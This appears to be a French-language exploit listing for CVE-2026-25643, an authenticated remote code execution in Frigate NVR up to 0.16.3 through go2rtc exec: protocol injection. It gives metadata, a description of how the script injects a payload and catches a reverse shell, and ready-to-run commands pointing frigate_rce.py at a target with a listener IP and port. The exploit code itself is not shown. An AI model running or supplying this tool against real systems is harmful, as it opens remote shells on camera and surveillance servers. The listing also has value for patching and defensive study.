
Exploit pour Frigate NVR RCE authentifiée via go2rtc exec : injection de protocole, automatisant l'exécution de commandes système et la capture d'un reverse shell.
Titre de l'exploit : Frigate NVR ≤ 0.16.3 - Exécution de code à distance authentifiée
Date : 2026-02-05
Auteur de l'exploit : jduardo2704
Page d'accueil du fournisseur : https://frigate.video/
Lien du logiciel : https://github.com/blakeblackshear/frigate
Version : ≤ 0.16.3
CVE : CVE-2026-25643
Avis de sécurité : https://github.com/blakeblackshear/frigate/security/advisories/GHSA-4c97-5jmr-8f6x
Les versions de Frigate jusqu'à 0.16.3 sont vulnérables à une exécution de code à distance (RCE) via la configuration go2rtc. Un attaquant avec un accès authentifié (ou non authentifié si l'instance est exposée) peut injecter des commandes système dans la configuration du flux en utilisant le protocole exec:. Cet exploit automatise l'injection de la charge utile, redémarre le service et capture le shell inverse.
pip install requests pyyaml
python3 frigate_rce.py -u http://target:5000 -U admin -P password -lh YOUR_IP -lp 4444
python3 frigate_rce.py -u http://target:5000 -lh YOUR_IP -lp 4444
Ce script est uniquement destiné à des fins éducatives et à des tests de sécurité autorisés.